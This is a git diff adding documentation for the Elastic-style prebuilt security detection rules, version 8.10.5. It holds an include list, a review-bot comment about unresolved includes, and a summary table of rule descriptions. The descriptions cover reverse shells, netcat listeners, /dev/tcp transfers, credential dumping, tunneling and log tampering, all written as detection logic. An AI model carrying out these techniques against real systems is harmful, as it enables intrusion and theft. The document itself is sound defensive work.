+include::prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc[] +include::prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc[] +include::prebuilt-rule-8-10-5-system-shells-via-services.asciidoc[] +include::prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc[] +include::prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc[] +include::prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc[] +include::prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc[] +include::prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc[] +include::prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc[] +include::prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc[] 
+include::prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc[] +include::prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc[] +include::prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc[] diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc new file mode 100644 index 0000000000..b9ab1ddc72 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc 
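Review bot: The include list still carries `prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc[]` (first long block, among the reverse-shell entries), which is the only `deprecated-` include in this file; every include must resolve to a file added in this patch or the Asciidoctor build fails with an unresolved include, so either drop that line or confirm the deprecated rule page is actually part of the change set. The same check applies to `prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc[]` (block with the Windows defense-evasion rules), which has no matching entry visible among the new files. Two smaller points for consistency: `exporting-exchange-mailbox-via-powershell` and `exchange-mailbox-export-via-powershell` sit next to each other and look like the same rule under two names, and `firsttime-seen-account-performing-dcsync` breaks the `first-time-seen-` naming used by `first-time-seen-driver-loaded`; if those file names are generated from rule names, the source names should be fixed rather than the includes.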
@@ -0,0 +1,626 @@ +[[prebuilt-rule-8-10-5-prebuilt-rules-8-10-5-summary]] +[role="xpack"] +== Update v8.10.5 + +This section lists all updates associated with version 8.10.5 of the Fleet integration *Prebuilt Security Detection Rules*. + + +[width="100%",options="header"] +|============================================== +|Rule |Description |Status |Version + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code, Potential Data Exfiltration Activity to an Unusual ISO Code>> | A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address, Potential Data Exfiltration Activity to an Unusual IP Address>> | A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port, Potential Data Exfiltration Activity to an Unusual Destination Port>> | A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region, Potential Data Exfiltration Activity to an Unusual Region>> | A machine learning job has detected data exfiltration to a particular geo-location (by region name). 
Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device, Spike in Bytes Sent to an External Device>> | A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. | new | 1 + +|<<prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop, Spike in Bytes Sent to an External Device via Airdrop>> | A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device, Unusual Process Writing Data to an External Device>> | A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain, Machine Learning Detected DGA activity using a known SUNBURST DNS domain>> | A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. 
| new | 1 + +|<<prebuilt-rule-8-10-5-potential-dga-activity, Potential DGA Activity>> | A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score, Machine Learning Detected a DNS Request With a High DGA Probability Score>> | A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain, Machine Learning Detected a DNS Request Predicted to be a DGA Domain>> | A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host, Unusual Process Spawned by a Host>> | A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process, Unusual Process Spawned by a Parent Process>> | A machine learning job has detected a suspicious Windows process. 
This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user, Unusual Process Spawned by a User>> | A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity, Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity>> | A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score, Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score>> | A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. 
| new | 1 + +|<<prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host, Suspicious Windows Process Cluster Spawned by a Host>> | A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process, Suspicious Windows Process Cluster Spawned by a Parent Process>> | A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user, Suspicious Windows Process Cluster Spawned by a User>> | A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. 
These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-network-scan-executed-from-host, Potential Network Scan Executed From Host>> | This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell, Potential Upgrade of Non-interactive Shell>> | Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. | new | 1 + +|<<prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap, Netcat Listener Established via rlwrap>> | Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. 
| new | 1 + +|<<prebuilt-rule-8-10-5-potential-linux-hack-tool-launched, Potential Linux Hack Tool Launched>> | Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded, Potential SSH-IT SSH Worm Downloaded>> | Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. | new | 1 + +|<<prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set, Setcap setuid/setgid Capability Set>> | This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid, Potential Privilege Escalation via Python cap_setuid>> | This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. 
| new | 1 + +|<<prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps, Potential Masquerading as Communication Apps>> | Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. | new | 4 + +|<<prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded, Expired or Revoked Driver Loaded>> | Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. | new | 3 + +|<<prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection, Potential Non-Standard Port SSH connection>> | Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. | update | 5 + +|<<prebuilt-rule-8-10-5-security-software-discovery-via-grep, Security Software Discovery via Grep>> | Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. | update | 106 + +|<<prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal, Potential Reverse Shell Activity via Terminal>> | Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. | update | 106 + +|<<prebuilt-rule-8-10-5-suspicious-java-child-process, Suspicious JAVA Child Process>> | Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. 
| update | 205 + +|<<prebuilt-rule-8-10-5-hosts-file-modified, Hosts File Modified>> | The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. | update | 106 + +|<<prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration, Modification of Standard Authentication Module or Configuration>> | Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. | update | 204 + +|<<prebuilt-rule-8-10-5-bash-shell-profile-modification, Bash Shell Profile Modification>> | Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. | update | 104 + +|<<prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification, SSH Authorized Keys File Modification>> | The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). | update | 204 + +|<<prebuilt-rule-8-10-5-sudoers-file-modification, Sudoers File Modification>> | A sudoers file specifies the commands that users or groups can run and from which terminals. 
Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. | update | 203 + +|<<prebuilt-rule-8-10-5-network-activity-detected-via-cat, Network Activity Detected via cat>> | This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client, Potential Protocol Tunneling via Chisel Client>> | This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server, Potential Protocol Tunneling via Chisel Server>> | This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. 
Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. | update | 2 + +|<<prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains, Suspicious Utility Launched via ProxyChains>> | This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding, Potential Linux Tunneling and/or Port Forwarding>> | This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. | update | 2 + +|<<prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable, Suspicious Network Activity to the Internet by Previously Unknown Executable>> | This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. 
Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm, Potential Protocol Tunneling via EarthWorm>> | Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. | update | 107 + +|<<prebuilt-rule-8-10-5-sensitive-files-compression, Sensitive Files Compression>> | Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. | update | 206 + +|<<prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow, Potential Linux Credential Dumping via Unshadow>> | Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim. | update | 5 + +|<<prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb, Linux init (PID 1) Secret Dump via GDB>> | This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. 
| update | 2 + +|<<prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected, Potential Linux Local Account Brute Force Detected>> | Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected, Potential External Linux SSH Brute Force Detected>> | Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected, Potential Internal Linux SSH Brute Force Detected>> | Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. | update | 8 + +|<<prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected, Potential Successful Linux FTP Brute Force Attack Detected>> | An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. 
This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected, Potential Successful Linux RDP Brute Force Attack Detected>> | An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. | update | 3 + +|<<prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack, Potential Successful SSH Brute Force Attack>> | Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. | update | 8 + +|<<prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem, Potential Linux Credential Dumping via Proc Filesystem>> | Identifies the execution of the mimipenguin exploit script which is linux adaptation of Windows tool mimikatz. Mimipenguin exploit script is used to dump clear text passwords from a currently logged-in user. The tool exploits a known vulnerability CVE-2018-20781. Malicious actors can exploit the cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. 
| update | 4 + +|<<prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity, Potential OpenSSH Backdoor Logging Activity>> | Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. | update | 107 + +|<<prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall, Attempt to Disable IPTables or Firewall>> | Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. | update | 4 + +|<<prebuilt-rule-8-10-5-attempt-to-disable-syslog-service, Attempt to Disable Syslog Service>> | Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. | update | 107 + +|<<prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity, Base16 or Base32 Encoding/Decoding Activity>> | Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. | update | 106 + +|<<prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory, System Binary Copied and/or Moved to Suspicious Directory>> | This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated. | update | 2 + +|<<prebuilt-rule-8-10-5-file-made-immutable-by-chattr, File made Immutable by Chattr>> | Detects a file being made immutable using the chattr binary. 
Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.). | update | 108 + +|<<prebuilt-rule-8-10-5-potential-disabling-of-apparmor, Potential Disabling of AppArmor>> | This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. | update | 2 + +|<<prebuilt-rule-8-10-5-potential-disabling-of-selinux, Potential Disabling of SELinux>> | Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. | update | 106 + +|<<prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command, ESXI Timestomping using Touch Command>> | Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. 
| update | 4 + +|<<prebuilt-rule-8-10-5-file-deletion-via-shred, File Deletion via Shred>> | Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. | update | 106 + +|<<prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory, File Permission Modification in Writable Directory>> | Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. | update | 206 + +|<<prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline, Creation of Hidden Files and Directories via CommandLine>> | Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. | update | 106 + +|<<prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file, Creation of Hidden Shared Object File>> | Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. | update | 107 + +|<<prebuilt-rule-8-10-5-kernel-module-removal, Kernel Module Removal>> | Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. 
| update | 106 + +|<<prebuilt-rule-8-10-5-system-log-file-deletion, System Log File Deletion>> | Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system. | update | 108 + +|<<prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid, Potential Hidden Process via Mount Hidepid>> | Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. | update | 4 + +|<<prebuilt-rule-8-10-5-potential-defense-evasion-via-proot, Potential Defense Evasion via PRoot>> | Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. 
PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. | update | 4 + +|<<prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files, Suspicious Renaming of ESXI Files>> | Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. | update | 4 + +|<<prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file, Suspicious Renaming of ESXI index.html File>> | Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. | update | 4 + +|<<prebuilt-rule-8-10-5-esxi-discovery-via-find, ESXI Discovery via Find>> | Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. 
